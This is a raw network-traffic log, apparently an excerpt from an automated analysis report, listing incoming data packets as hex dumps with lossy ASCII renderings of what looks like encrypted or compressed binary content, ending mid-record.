2022-11-07 22:49:10 UTC	11529	IN	Data Raw: 69 28 79 fc dc 50 de 2f 1e f6 2a 7a 7f 4f ad 9e 13 23 6b 50 65 2a 6e 6c 04 9d e5 88 79 e2 de d4 e1 f6 45 69 fc ff cc c1 9d 43 68 31 39 42 26 95 09 6b 82 2c e3 4f 81 50 b2 bb f1 58 92 65 84 a6 cd fd 8c 33 9f 9a 8a 17 1a 5a ae ca 7f 23 ab a9 14 e9 46 a3 cf d7 97 f7 e8 77 4d f4 62 75 01 43 be 73 d2 aa 57 43 09 a4 9c 72 08 b1 f2 57 2c 8e c8 60 67 90 10 96 08 82 35 4f 88 d5 fd ee e5 51 3e 2d 70 b1 fe 5f 12 f6 b7 51 93 68 1a 55 3c 57 d5 5e 66 49 6d 48 8e 30 cc 91 bb 56 9a f1 3a fe a6 07 93 e0 46 50 e1 41 53 98 21 41 88 5c 3e fb 82 41 5a 32 a3 87 81 a8 57 14 24 47 e3 88 33 78 36 10 81 4d c8 0a 83 55 33 a3 29 2c 9f 2e 71 67 ba 33 fe 06 ad 2c 2f a4 aa ea 4b e8 13 86 d1 6c 63 17 6e f5 72 10 42 2b e4 58 bc aa 40 28 57 c3 51 b8 f2 72 23 9e d6 3a 60 1f 5e e0 de ad 84 Data Ascii: i(yP/zO#kPenlyEiCh19B&k,OPXe3Z#FwMbuCsWCrW,`g5OQ>-p_QhU<W^fImH0V:FPAS!A\>AZ2W$G3x6MU3),.qg3,/KlcnrB+X@(WQr#:`^
2022-11-07 22:49:10 UTC	11545	IN	Data Raw: 58 2d 36 62 80 f1 6f 4a dc 23 a2 86 7b 9c ca f3 72 cf 20 77 ef 40 a7 fe a7 a9 a8 17 6e 69 d9 f6 4f ac 2b 25 c4 78 a8 86 bc 02 fc f8 be 72 e7 67 11 a1 53 5f 66 c9 e5 b9 b8 c2 2b a3 ca 4d 8b da e2 7d d3 0d a1 78 3d d2 48 df 53 8d 46 52 85 e5 ee 61 83 d7 51 2a d4 f6 13 45 4a 74 ec a6 d7 86 ff b5 a4 ae 05 6a 1d 50 68 1f 3d 48 85 76 46 3e f8 0a 06 ca 94 8e 4f 0e d7 c3 a9 01 28 46 d5 61 d2 e1 42 78 9e 22 98 5d 5e 12 15 5f b3 a4 09 c7 c7 3c fd 2b 30 df a8 c4 98 3d d1 91 b4 d9 19 76 08 d9 21 9e b5 3c 8d 5b 68 fe 0f c3 d8 3d 4e 38 fa cd 6c 98 a6 0b 0d 6f fd ae 96 1f a2 6c db 7e 73 3c 53 6a f7 77 18 c8 43 36 1e dd 7f b7 f9 28 6a e8 cd 96 6d fc b0 ce fe 4e 3e e1 35 18 09 3e a9 74 32 86 da e4 af 4a aa 80 7e f3 d8 9c 28 ff 80 2f 95 9c a7 fe 12 d2 a7 e2 05 0d 92 7d 52 Data Ascii: X-6boJ#{r w@niO+%xrgS_f+M}x=HSFRaQ*EJtjPh=HvF>O(FaBx"]^_<+0=v!<[h=N8lol~s<SjwC6(jmN>5>t2J~(/}R
2022-11-07 22:49:10 UTC	11561	IN	Data Raw: a5 8e 67 ab 00 29 0b 9d 93 27 b7 d9 20 37 64 ee 1e 69 3e 20 66 d8 84 c1 ae 80 79 85 5a 48 b5 1a b0 83 9f bc b8 97 c3 32 59 65 52 f4 44 9f a7 ef a8 b0 e9 d5 2e f6 73 57 a4 90 4b 4a d7 61 9d 09 61 59 63 4b bc 91 72 e1 2a 26 8f 64 e5 b3 9a c5 f0 d2 bb 82 2e 5c 72 d1 de c1 f3 6e 6c cd 3a 33 e4 6a 34 fa 44 43 ab 5a 89 02 fd 12 68 92 ff 8d d8 ca cb 8b 72 0e 12 f7 c7 a4 f0 ab ae 95 f5 71 13 25 3a 01 bc f6 20 9d 6e d3 5d 02 d4 61 b2 08 62 fe e5 59 8e 48 15 9c 47 4a b8 49 72 a2 4b 44 da c6 90 d9 2c b5 0b fc 78 e9 68 9f 65 e3 3b ac 41 2e 7a 6f 1e 67 a4 eb 99 68 5a b3 80 e8 88 a4 52 ba 27 25 bf b2 d1 12 fd a9 ee b8 ef 20 26 ed 51 2a 79 36 56 99 8f 9b ce 0b 1d f8 4b 07 a1 f2 00 ad 43 76 05 79 29 f3 ca aa 9b 1e 38 1b b9 f7 fc 8d 36 4f a0 5e e2 00 12 07 56 80 b8 b5 59 Data Ascii: g)' 7di> fyZH2YeRD.sWKJaaYcKr&d.\rnl:3j4DCZhrq%: n]abYHGJIrKD,xhe;A.zoghZR'% &Qy6VKCvy)86O^VY
2022-11-07 22:49:10 UTC	11577	IN	Data Raw: 96 e3 85 cb 7b c1 99 c3 74 2b 3c ad 2a 66 07 2c f9 3a e4 3f a5 b7 e6 30 ef c6 f1 26 66 4c e3 34 c3 c0 8e 4e 4d f2 c5 7e ff 39 32 0e e1 e6 9f f7 cb ce 3d 6e 26 02 e3 5e 7e 07 34 e0 01 a7 8a 74 b2 63 9e 38 d8 1a bd 4a 3d 5c 83 97 b5 34 f9 2b d4 ff 71 43 12 19 6b 53 98 a6 6a 5a 51 1f 4e a8 6a e8 3a 03 1f 8c 99 c0 eb e6 09 42 b7 04 eb 8e ce 8c 21 9b 44 cf 12 5e 35 5a 0f b2 b3 a6 8d 1b 48 59 ec 46 2a 94 9b b4 7b a1 cc e1 c3 48 8f a1 70 4b c4 74 1d 53 e0 d1 d4 5d 73 87 be 0b 5c 12 33 93 8e ab 2b 9b d6 95 75 6b 92 07 2d ea 95 90 b6 0c a0 f8 a7 d9 cc 91 93 53 d8 97 92 57 8a e5 02 a2 dd 4b 4a e4 76 fb 7a a6 77 6b a3 9d f1 77 56 fa 3e 1f b0 fb 42 b0 22 9d aa 62 e3 b1 97 5b 41 f4 75 21 50 67 27 71 4c 09 d6 65 e7 f1 c9 7b 9e 56 82 0b f4 49 80 59 82 ec 68 0c d8 1a 9d Data Ascii: {t+<f,:?0&fL4NM~92=n&^~4tc8J=\4+qCkSjZQNj:B!D^5ZHYF{HpKtS]s\3+uk-SWKJvzwkwV>B"b[Au!Pg'qLe{VIYh
2022-11-07 22:49:10 UTC	11593	IN	Data Raw: d7 b3 65 9e e2 55 2b a0 89 e4 a7 66 6d c0 e2 0e cf 47 bd 61 07 74 f8 53 f8 7e 9e af 12 ca 81 f1 0a 96 5e a0 e2 47 f6 e9 a7 2a 5c 94 b9 ad b3 ac 48 d3 ef ec 96 41 00 ec 66 4b f0 7c e8 12 00 dc 49 37 03 6e b6 d2 a8 96 89 e9 dd 7b 58 72 b9 98 45 f0 f1 e0 fe 1e 61 e0 fb dd b6 d2 c1 13 db b1 09 10 79 a8 34 8f 50 f4 86 24 53 f1 47 3c 21 5b 45 c5 dd b0 1a 9c f3 62 1c 17 92 07 03 8d 08 47 93 60 f7 b1 df 75 6a 7c a3 d7 a3 11 92 6d a7 31 d0 4a 5f 9d 2c 19 3e ab 43 cd 9c 54 69 1e e2 12 08 d5 8f 2d 66 bf 2a c8 b1 6f e7 1b ba 5c 2c 5a f0 0a b3 71 48 fb 82 5f b8 22 d5 5e 13 aa 34 6a c8 84 c5 ef 52 05 d1 bf 9b 42 29 47 54 98 48 4f 08 84 d9 5f cd ed 18 a7 bd d4 26 6b 68 71 12 c9 f7 6a fe 98 39 37 33 98 f8 6d 86 ff 68 91 f5 22 90 27 f1 95 96 99 09 f3 e5 ca de af 4c 0d 09 Data Ascii: eU+fmGatS~^G\HAfK\|I7n{XrEay4P$SG<![EbG`uj\|m1J_,>CTi-fo\,ZqH_"^4jRB)GTHO_&khqj973mh"'L
2022-11-07 22:49:10 UTC	11609	IN	Data Raw: a3 f0 a6 dd 8a b3 fe d9 af 67 d2 b6 9b 65 fd 6b f1 bd 7a 3c f8 d1 2b d3 51 8b 9a 6e ee cd f6 2b b0 40 fd 8f 99 8e d3 a1 cc ec 5d 5e 65 65 d1 3e 6e 49 60 56 7f e1 3b 2a 93 41 97 e6 50 f8 dd d3 95 db fc b1 68 e3 c9 15 a9 9f 17 ab 72 00 c0 c7 e8 48 ac 61 56 ac 75 89 cf 08 ed 80 f9 08 19 f5 2d bb 11 73 32 b1 72 05 cd d0 8f c4 52 d9 0d c4 78 0e a1 31 e0 e4 52 1a 94 32 ae 88 11 8b ff 28 34 04 5b 11 de d0 44 90 f9 98 ce 6b 68 4c 9a 2d 44 cd 71 57 f0 4a ae 3e 84 50 2e e2 14 6d f7 cf 9e 33 98 f2 29 d1 94 71 87 91 42 1e f6 c9 af ff 5d e6 3b 90 90 f9 3d a0 a8 85 75 79 ea 9d d5 27 49 97 e4 5b d8 1c ba 3f 58 8c a8 a9 1d b7 8b e3 10 67 f4 49 45 83 1b 1d a2 26 cd be 12 80 4d 20 94 59 67 60 7e d6 ed fd 83 f2 cd bf cd f5 44 23 e8 e2 84 de 26 65 9d 58 fe 0f 45 94 1a 6e 7f Data Ascii: gekz<+Qn+@]^ee>nI`V;*APhrHaVu-s2rRx1R2(4[DkhL-DqWJ>P.m3)qB];=uy'I[?XgIE&M Yg`~D#&eXEn
2022-11-07 22:49:10 UTC	11625	IN	Data Raw: 98 b6 66 84 4a 12 f3 ab 59 f7 af 7e 92 e6 c3 d2 ee c5 be e8 0f 1d 28 64 b1 02 d8 0d b7 db 93 aa 2a c9 7d 0b ee 92 bd e5 05 03 f9 d2 9e e0 3c c6 be b0 2f 81 cc d1 5d 1b 22 f6 c1 fe da b2 68 91 ce 6b 5e 0e 66 c3 e9 b6 24 e8 e7 bd a5 e9 db 8d c4 62 fb c0 dd 6b 5b d3 a2 d1 04 f6 b7 ab da 60 39 31 c9 49 a0 a8 4a ea 61 41 b5 79 57 ef 7f 18 70 9f 56 2f ff 74 e0 46 a4 5f 44 3d ed d9 70 fd 8c 94 a3 ff 5a 79 14 74 df d2 09 e4 c1 c3 e9 c0 8e 01 67 b8 2e e9 34 3e 40 ce dc d6 3b 15 02 ca 78 75 f8 9d 09 d7 f9 e6 ea e1 14 c7 e4 bc 4c e1 fd 43 b8 32 ca 7e 05 cc 9c 1a 83 9a 5b d6 a7 10 a1 15 b9 76 71 88 e5 bf 2b b6 eb 3d bd 87 58 f9 7e 33 a3 cb 62 23 b0 f8 22 ad ee a6 0f 83 4d 88 bb 7c a5 50 9c cf 0d 14 2a ea 0b 43 69 67 58 69 66 36 0a e1 30 67 10 14 29 4e f4 7f 30 88 08 Data Ascii: fJY~(d}</]"hk^f$bk[`91IJaAyWpV/tF_D=pZytg.4>@;xuLC2~[vq+=X~3b#"M\|PCigXif60g)N0
2022-11-07 22:49:10 UTC	11641	IN	Data Raw: c7 ab f6 96 12 ff c0 af 68 39 b1 5a a8 75 55 6a 83 a4 c2 13 82 66 47 01 3d e4 c2 94 69 7d 6b 77 49 ce 9a 4c 7a 02 f3 f4 62 00 69 13 1f 2e 18 f4 13 e7 78 4e b6 9b a8 8a da 78 da 5f 01 f0 7a 65 43 5e 39 ea ea 9d 9b 5d 2b 66 5e 99 d3 16 ce 30 40 e3 7f 6d 69 3e 10 94 d7 33 e0 8d 73 93 17 ba c7 cb fa 1a fb e4 d3 88 58 72 e6 2e 33 63 e7 67 67 d7 eb 16 69 05 d8 df 84 b0 23 d2 6d 1d 6d 76 2a d9 ee 9a 8d e3 31 5e 84 62 49 0e 98 50 65 34 21 ae 57 6f 77 4f 72 5e 7f 93 d9 b4 8e 8d d7 73 20 33 3c c3 32 a6 81 32 09 b9 b6 5c 8d 57 c1 d6 71 28 e5 2f e2 a4 3c 3e 10 8a 21 90 12 a6 6d ad 85 1e 1a df 9a ec 29 64 67 6d 9b 17 6c 6f f8 b0 83 dd 67 13 01 d8 c4 4f 36 c5 55 f0 51 6a e6 63 25 c9 61 cd 2d 6f 59 ac d1 1b 5c 72 2c d4 e2 16 98 2e a2 f5 45 78 77 03 a4 80 36 8e ca 1b 27 Data Ascii: h9ZuUjfG=i}kwILzbi.xNx_zeC^9]+f^0@mi>3sXr.3cggi#mmv*1^bIPe4!WowOr^s 3<22\Wq(/<>!m)dgmlogO6UQjc%a-oY\r,.Exw6'
2022-11-07 22:49:10 UTC	11657	IN	Data Raw: 68 26 87 3c e9 ba dc 1e 97 6f c8 71 49 cd 83 a4 4e e4 dd d8 fc b6 12 a4 81 22 7b 88 bb a7 ba a6 4a 3a 40 ea 2e 24 67 5b 2c e0 54 21 2d 53 18 58 c3 c5 c3 27 47 07 03 0f ab 97 7e 36 19 63 04 7a 1d a4 bd 6b 09 16 7b bf 59 2c 74 bc 5a b9 a7 18 94 dd a9 a2 2b 42 ff da 15 98 29 c6 22 1c 84 09 35 ac 1b c3 48 ef ed 2d 83 92 e9 87 92 cc b6 bf 00 1d d9 41 49 ab 22 ae 78 ce 2c be 63 2f 05 fd 0f 5d d9 ae 32 92 ad 5d c7 22 be b0 31 5e 4c 9b 6a 2d 4d 28 63 e5 bc 96 b3 e5 f9 f3 36 30 7b 48 0b 04 cf 62 61 7f 11 df d7 13 c7 da b2 0a 5c 2e 5e 91 69 0b 3e 0c 7c c3 b4 1e bc 31 97 b5 bd 33 fa 33 a9 f5 53 7a 0d 20 38 7e 11 b3 66 66 87 1f 87 f1 92 4c 9a d0 6d 20 de ed fa 23 12 e3 c6 bb 6b 78 d3 41 f1 0f 30 89 66 2b 91 64 7b c1 05 5b 53 a0 06 a4 98 c5 b6 ae a9 fd 8e 44 38 70 e0 Data Ascii: h&<oqIN"{J:@.$g[,T!-SX'G~6czk{Y,tZ+B)"5H-AI"x,c/]2]"1^Lj-M(c60{Hba\.^i>\|133Sz 8~ffLm #kxA0f+d{[SD8p
2022-11-07 22:49:10 UTC	11673	IN	Data Raw: d2 4f fc 74 9f c6 d5 cc d1 67 e1 2b 2e 23 e0 16 56 3c 46 bc b3 ab 5d 42 f7 b0 b5 e4 11 ca 2d 39 d4 05 d3 e0 c2 34 7a 44 10 65 e2 68 27 b2 6b ec 0a 2a 73 06 a1 50 e0 46 d1 5e 30 01 67 aa 01 4e 06 72 21 92 dc 0b 67 f1 b3 3d ca 02 d4 bb 79 01 e1 d0 d7 a7 12 ca 84 0c 4e 7d d6 0c 49 9b b8 53 f4 b4 d8 aa 75 65 ae 51 a7 68 28 c1 eb d1 bb b3 04 cd f5 74 a1 27 19 f2 b0 28 bb 54 8c 47 cc c2 a3 35 00 63 e8 96 38 ae b8 a4 2d fe 27 8a dc 81 7c c6 61 40 6b 43 bd e3 9a 50 c2 0e 9c 13 44 25 6e 97 96 f8 6a 03 84 55 4d cd 78 9a c8 84 6b 88 b8 81 84 32 2e 50 e2 20 2e b3 89 26 ea 6f 0e cb f2 eb 2c 13 3f 8d 42 11 30 4b d4 41 3e f0 6b 49 b3 67 08 db ba a2 53 1d 9c 0b f4 a5 71 dd 6b fa 09 99 86 0c 1e ec bf af b5 8f 40 ab 6b 9e 3a d7 83 ee e8 96 cd a3 70 33 40 9c 83 34 31 a7 b3 Data Ascii: Otg+.#V<F]B-94zDeh'k*sPF^0gNr!g=yN}ISueQh(t'(TG5c8-'\|a@kCPD%njUMxk2.P .&o,?B0KA>kIgSqk@k:p3@41
2022-11-07 22:49:10 UTC	11689	IN	Data Raw: b3 d3 d8 2a bb f1 55 c4 c0 a6 37 af f7 48 e0 d0 64 11 b7 10 7d 41 10 28 ed 62 bc f0 8c 2b 14 35 00 50 7b 13 92 1b 48 f7 fa 07 d1 81 0c ff 7e f1 a7 9a 75 17 b5 19 c9 13 ad f6 ac 94 ad 34 de 7d d9 37 66 d3 6d ab 56 1e 10 ea cd 30 c7 1a aa 82 46 8e 9b 91 c3 50 6c 7e 9b 46 39 55 2b cd c0 a0 2c 5d a5 8c a5 0c 99 ce 60 f8 63 d5 a4 34 46 42 bc 51 ae 3a cb f7 0c 4a 3d 74 8f a9 29 dd 70 3c e2 b0 56 89 74 17 cf d4 21 b5 f1 8f 72 93 ab 8b f5 dc 1a 00 2e 5b 11 d1 16 98 ea 25 c7 96 a6 4a 60 25 23 dd 9a 24 ef 6e 16 38 bb 5a 9f 30 88 c1 13 68 b4 09 09 48 c6 02 a7 3c 47 47 d3 68 ac 3a 9f 8e ea 26 6d 3d 2d c0 6e 2a 9c c8 2f f1 ee 3a 6a b0 f3 bd 7c f2 f3 df 48 42 f2 3d 82 af 62 b0 49 a9 13 d5 2c 20 9f 49 11 56 d8 33 aa 02 76 94 2c 9d d3 81 e8 1a 13 07 f9 90 07 dd 59 80 3f Data Ascii: U7Hd}A(b+5P{H~u4}7fmV0FPl~F9U+,]`c4FBQ:J=t)p<Vt!r.[%J`%#$n8Z0hH<GGh:&m=-n/:j\|HB=bI, IV3v,Y?
2022-11-07 22:49:10 UTC	11705	IN	Data Raw: 14 ac 89 b5 4d dd 92 89 fe e7 6a 4d 95 b5 33 c2 1d ba be 68 c2 41 57 85 2f 3e ca f4 aa d1 64 6b e3 ed f0 f3 5d b6 73 99 d9 70 68 25 73 23 b6 cf d5 eb b8 70 99 83 f3 ad 79 37 a7 98 e7 f5 6b b6 2d fe 53 bb 3a 4f b0 d0 c3 50 ba 5c 2a 62 de 94 25 ca eb ab 92 12 35 f1 42 10 22 86 33 aa 29 b3 d1 fe a2 88 54 d0 2f 85 f1 8f 22 c6 50 9f 4c b6 ed 1a 3f 33 88 f4 3a 9e 3d ff 55 41 6f 8b 37 33 2f 84 a8 42 81 ed 42 fa b5 c4 6c fc 45 74 39 6c a3 cc 88 b1 78 db a3 d4 d3 84 53 f3 67 c9 1b ac 32 10 1a 56 89 e5 8a 98 27 c7 05 7a 39 81 be 55 7c 95 11 eb 61 12 5b cd 9c 0e 2c d9 9b 75 57 e8 b2 87 85 13 df 43 5d d7 35 07 1d 8c cc c8 1e a8 b0 16 2a 76 9e f6 39 b2 aa e3 9a 1c 65 87 7c 93 14 f1 96 a3 76 94 56 36 95 dc ea 25 e6 30 6f 27 e0 9d a8 29 20 13 b0 d5 e6 d3 75 9c 5a 34 fe Data Ascii: MjM3hAW/>dk]sph%s#py7k-S:OP\b%5B"3)T/"PL?3:=UAo73/BBlEt9lxSg2V'z9U\|a[,uWC]5v9e\|vV6%0o') uZ4
2022-11-07 22:49:10 UTC	11721	IN	Data Raw: 24 9a 00 ac cc 49 c9 21 a2 d9 d8 2b 8b 56 1a d0 65 a2 ee 22 70 ee 2e 0b 8e 18 95 cb a5 72 29 98 5d b3 76 be 5d ef 99 e4 ef bf e6 27 84 c3 1a cb f9 0e a8 b4 5c b2 fc 83 df 82 cd 0b 47 7c 1b bd b8 7e c1 10 da 06 cc db 08 58 1a b0 31 3d 4d e1 57 d1 76 61 3d b4 8a 44 b1 f3 0d 77 c3 96 22 15 fa 0e dc cd 3c 18 05 8d bd 1c 40 7f 2c e4 56 f1 97 7f 7a 74 9b 27 38 eb 3a 05 71 e4 3c b9 b2 56 e1 c1 07 47 f5 80 fd 92 e4 9b e2 da ed 39 bd 7e a6 c1 30 7c 94 73 c0 95 e1 6a 26 a8 23 4e 70 6e be dc 45 0a 15 4b 99 90 10 0c b8 34 62 83 57 d5 16 ee f7 32 7a 8e 7a ad a3 15 6a d9 6c 8c a5 0b 1b c2 3e eb 11 ed 47 7d e9 41 b0 eb 17 64 ed 34 cc 65 4e 5c a8 9e 3a 09 87 d5 de 88 b0 c6 70 d0 cd 19 29 9e a9 e4 cb 95 90 1a a2 08 19 bb d3 12 74 bc 10 12 e7 b1 b4 13 ec a4 b7 a5 8d b2 aa Data Ascii: $I!+Ve"p.r)]v]'\G\|~X1=MWva=Dw"<@,Vzt'8:q<VG9~0\|sj&#NpnEK4bW2zzjl>G}Ad4eN\:p)t
2022-11-07 22:49:10 UTC	11737	IN	Data Raw: 2f 97 b5 d4 ae 17 ce 00 1e 83 1a e0 68 23 0a 5d 41 50 de 8b b1 98 73 80 23 c5 12 91 4f 90 e2 f0 04 54 85 1e 7d 69 98 4e 55 c2 8c 21 11 16 f9 6c 4b 1c d5 bf 14 18 17 31 50 f5 4b 76 9d 4b 81 4b ce 00 a6 c0 81 d3 cf 1d 02 6c 5a 24 8d 29 2c f3 0e 95 e2 ef 00 92 8c d1 8f e4 bf a6 07 ef 2f 7d 57 93 f4 75 67 b7 cb c8 e4 be 92 62 de b0 84 de 1b e6 60 70 3b 15 7e 3d 34 d4 8f 56 d1 ae 75 fa a5 98 b3 9e 6a 08 74 0f 69 eb ac 7d d2 ed 55 7e ed 56 ca 35 ed 66 c2 69 f3 ad dd cb 4c 4d d1 fa fc 71 fc db 35 01 2d 31 f6 12 f6 47 f4 ba ab 70 e6 fe 26 95 53 5e 03 df 58 17 e3 0c dc 5b 56 64 9c ea 81 33 c1 23 a7 26 b8 de 93 eb 91 44 07 e6 01 f1 41 9c a4 99 77 0c 55 c8 23 38 58 b8 9c cf bd d0 c6 30 a4 bd 89 5d 9e 1e 78 0c b5 8c 31 2b 0f e3 6f 63 2d a8 00 1a cf a2 a7 50 89 c1 98 Data Ascii: /h#]APs#OT}iNU!lK1PKvKKlZ$),/}Wugb`p;~=4Vujti}U~V5fiLMq5-1Gp&S^X[Vd3#&DAwU#8X0]x1+oc-P
2022-11-07 22:49:10 UTC	11753	IN	Data Raw: bf d3 7e 6e ef a9 2d 58 af f2 e8 c1 c8 d3 d7 46 d3 b0 d6 66 ad 8d 17 07 c2 1d 12 ce c3 b9 12 79 5f f9 fe 3c 13 41 75 9e 13 ad c6 7f 1a e7 b3 94 90 33 37 46 da f2 6c d5 53 75 76 62 63 90 96 f8 2b df b4 f3 c3 a7 1e 0a 98 7f 0d 07 af 35 78 b5 94 ab 8b 33 30 40 2f c2 d0 96 af b9 92 f0 84 00 c9 f7 9c cf c0 fc fd ae f4 35 b7 ce 35 a3 1d d0 85 d4 0e d8 d3 f6 9a 91 f9 35 fb 6a ba bb ca f2 e3 fd f0 41 25 e4 df 02 b1 42 e3 6c 84 4a d3 96 6e 70 20 bc 68 ad ed 07 c7 26 74 e3 78 25 d8 df 4f 29 f3 ad 84 e9 f5 2d 7c 98 3f d2 f9 4d e9 ff a5 e2 01 93 db ac 1e 0f 88 9d da f3 f7 d8 23 47 5a 88 86 7c ce 45 38 4d 83 0f a2 36 76 18 ed 1b 79 82 91 77 69 08 fb 9b 86 29 45 dd de 29 07 ec 17 1c 71 1b 13 b3 20 4e db 35 b5 1f 50 ec c1 f0 14 21 e3 55 ad c3 66 81 be 97 61 4c 90 28 b5 Data Ascii: ~n-XFfy_<Au37FlSuvbc+5x30@/555jA%BlJnp h&tx%O)-\|?M#GZ\|E8M6vywi)E)q N5P!UfaL(
2022-11-07 22:49:10 UTC	11769	IN	Data Raw: e4 77 ce 40 27 92 88 fd f7 bf e7 a5 19 6d 79 82 11 6b 23 7c 4a f3 0b ea 65 1a 86 f2 b3 19 74 ca cc 51 a6 69 d5 27 69 a3 e1 1e 1a 1b 8a 97 24 97 e9 d1 a7 ad 77 6e c0 f4 05 2a ad 3d c1 0c d1 f8 15 ef 5a 79 af 66 3b 72 fd c0 16 20 2c 52 55 8d ed 06 e3 bb 1b 43 f3 64 e0 17 4a d2 b5 b1 97 1b 71 4b 1c 84 20 8f 31 31 95 16 a1 4d 06 08 d0 92 fe d9 75 14 3d 8c a0 ef fc 4f b7 0d e9 1d ff 03 40 24 31 46 ea db 55 53 57 c9 01 d0 0d bb 32 94 dc f4 e7 31 c7 7f 78 20 f8 7a 86 8c 76 02 60 1e f4 8a c0 a3 92 63 e1 95 83 02 a3 8c 7f 34 4d 00 6d 3c 76 54 84 2d 4f 19 a6 37 bf 96 20 16 be bb 74 4e d8 c2 42 b4 06 52 1f a7 0c 52 ca 0c 0b ce 73 87 98 6d 9e 67 ce 3f ba 6f d8 cd 16 02 66 17 38 82 98 e6 89 3a 19 95 7f cc cb 63 a2 12 2e 83 59 91 e5 49 a0 2c ce b5 37 0a b3 ce 56 8d 73 Data Ascii: w@'myk#\|JetQi'i$wn*=Zyf;r ,RUCdJqK 11Mu=O@$1FUSW21x zv`c4Mm<vT-O7 tNBRRsmg?of8:c.YI,7Vs
2022-11-07 22:49:10 UTC	11785	IN	Data Raw: 11 36 9f 35 30 b7 87 06 a8 22 28 a5 cf a6 ef a2 5c fe 56 db 18 81 67 43 a3 50 e8 83 86 d9 d8 ac 75 a5 c3 b6 d4 83 99 ea bf 4b 82 70 09 a9 d7 7c 52 01 fe 00 61 ef 1e 0a 08 99 28 64 25 5a 83 ce 5e fe 14 ea 87 4e d7 04 0b 4d 2a b8 5c ce 70 f4 45 a9 46 25 6b d9 d3 3b 70 f2 e4 df 84 e1 77 8c 1d ab 39 88 d1 02 aa a5 e9 e9 f7 d3 ad 19 ca b7 77 bf 51 2c fc 49 a1 6d a3 6c a3 e9 e2 da 91 06 26 b0 49 46 1d 65 41 36 59 08 04 34 60 b5 71 90 16 47 ac f4 8c 2f 58 f1 d0 b3 ed f8 33 a4 b1 2a 9e 64 13 aa a6 b1 94 38 53 8d f5 49 44 ff f4 e9 c6 05 1a a7 8b a5 7e 87 a9 a6 a1 a6 be 38 8d bc 1f ef a1 9f 9a 4e 52 c2 fd 10 4f aa a9 fb fb 91 a0 b3 df 21 de 80 95 c8 43 69 bd 72 ec 9d 2e 56 7f 09 19 d0 4c 5d 87 88 82 6f af 34 21 64 b0 e5 57 88 ce 4e 37 4a b0 31 8b 44 ea ef 34 ee 00 Data Ascii: 650"(\VgCPuKp\|Ra(d%Z^NM\pEF%k;pw9wQ,Iml&IFeA6Y4`qG/X3d8SID~8NRO!Cir.VL]o4!dWN7J1D4
2022-11-07 22:49:10 UTC	11801	IN	Data Raw: b7 22 e6 15 29 16 d6 43 76 1a f2 07 b0 c7 0d 78 ad 1b 40 ac c1 78 52 8c 12 13 f7 6e b2 c2 1f 07 e6 17 cb 84 f4 df 48 88 4f b5 7c d7 1f ac 23 5b 79 59 f5 37 af cc 9c 0d 0c 8e 51 c2 03 5b 31 09 f4 e1 77 63 3a 98 46 29 64 33 11 b5 f1 08 6f 3d f9 16 48 6a 2e b7 52 bd 23 6e 43 5e cc b8 12 0c 4e 62 a0 42 5b 31 45 df d1 97 d0 e5 d6 68 1d b8 82 e5 3f 0f 5a 75 6c f5 c2 ab 7a 9e e4 05 76 b0 f3 35 d8 f5 8c eb 94 93 d4 a7 0f 30 31 30 a6 c1 3e db d8 8b 80 69 47 ab 5b 73 24 ca 20 eb 37 15 dd 65 de 67 5b 07 b9 d6 32 16 d7 53 26 cb b1 9f 3d 87 e8 4c 2e ed 73 88 89 4c 96 a8 49 83 67 e1 52 92 14 bf 42 0a 5b 45 6f 97 43 a9 8c 46 6e 18 2c 2c d8 51 f6 55 80 b8 93 36 89 91 c0 26 33 7d 81 db 22 f1 1b 06 79 fd 57 96 a5 c4 9e 08 ad 76 27 b7 84 4c 73 31 35 b2 43 f9 e5 27 51 73 e7 Data Ascii: ")Cvx@xRnHO\|#[yY7Q[1wc:F)d3o=Hj.R#nC^NbB[1Eh?Zulzv5010>iG[s$ 7eg[2S&=L.sLIgRB[EoCFn,,QU6&3}"yWv'Ls15C'Qs
2022-11-07 22:49:10 UTC	11817	IN	Data Raw: 7d 60 da 91 28 4f 14 03 92 48 dd bb 42 84 49 0b 82 84 5e a3 97 9f 59 10 66 9f f0 9b fc bb b0 32 5d 0c a8 bc 9e 0e 9c 11 0a 33 1e 60 1c bc 7f 8d 8d 7b 39 05 5d 83 ea 52 e3 d1 a5 70 f5 2d 80 b7 af c7 ac 7e 7f a7 d5 5b 92 27 20 07 68 32 af fb d1 4f ad 44 9f bc ff 70 dd 28 ab 10 74 91 63 5a a3 7f ca f9 72 d0 8d 3c 9b e4 32 ee 3c 7b cb 2f d8 17 59 57 3d 68 3c c0 49 88 11 a8 2f 64 a5 bc 6d b6 8f d3 07 45 4b fb e0 9f ef 6e ff 20 6b 43 c4 a7 6e d7 4a 6e ce 44 cb 5b a7 63 46 43 90 ef 95 f9 02 f5 d4 2d 79 4e 85 52 a1 86 6e d0 4a 01 18 59 b1 8f eb 83 f3 70 5e 08 5a 6b e3 30 f3 90 9e 90 f4 bd 46 4e 6d e2 8d 07 8b 35 41 67 f6 d5 d3 4d 87 c7 e7 18 38 94 da 39 97 c5 2c 29 60 72 91 88 d5 5b 0f 03 e8 72 b7 dc f1 99 07 4a 4a 91 d3 db 3a b4 cd 39 01 62 f6 07 3f 69 45 8c 68 Data Ascii: }`(OHBI^Yf2]3`{9]Rp-~[' h2ODp(tcZr<2<{/YW=h<I/dmEKn kCnJnD[cFC-yNRnJYp^Zk0FNm5AgM89,)`r[rJJ:9b?iEh
2022-11-07 22:49:10 UTC	11833	IN	Data Raw: 3e 29 af cf b9 30 4a 85 ec f3 d5 9d 8b 99 df 89 a5 86 d4 7c 3b b4 f7 c8 11 a6 7d ff 44 f8 c6 13 c9 e7 71 ad fa a1 ef 60 90 74 96 20 75 b3 0c 82 ad 47 ed 3b 6c 52 8b 1a 02 ff 3b ee e5 97 ca 31 c5 21 d4 51 a7 3d 45 be ea da 3a 7b 75 61 63 14 e9 9b b4 a7 7c f3 6e 08 27 19 65 99 5a 91 61 27 b7 33 41 f1 f2 08 49 28 f1 0f 4d 43 98 0d 19 54 4b 74 86 8e e1 de 0b 6f 2e 51 87 5c 66 c6 d1 01 8a dd 48 0f a9 2a db 67 ea 52 45 53 15 73 2f ec ac 69 30 f2 e2 9c 72 6e 11 e6 e5 ce df 81 dd fd ca 95 1c 24 b0 1b 6d 7e f3 ff 0b 8a 7a 94 2b 0c 9f a1 07 b1 e2 21 d6 6a ab 92 ae af 5f 91 f4 0f 34 56 ef cb 2f 54 4d 7f f7 58 f2 fd 53 3f e8 11 1d ee 97 c2 47 7a 48 6b 52 38 92 27 fe ae b7 92 e7 35 3d 88 65 8d 8e 02 3f 98 df 65 45 10 4f b5 1f 28 48 15 e5 5a e9 b4 0b 62 a8 3a b8 33 9a Data Ascii: >)0J\|;}Dq`t 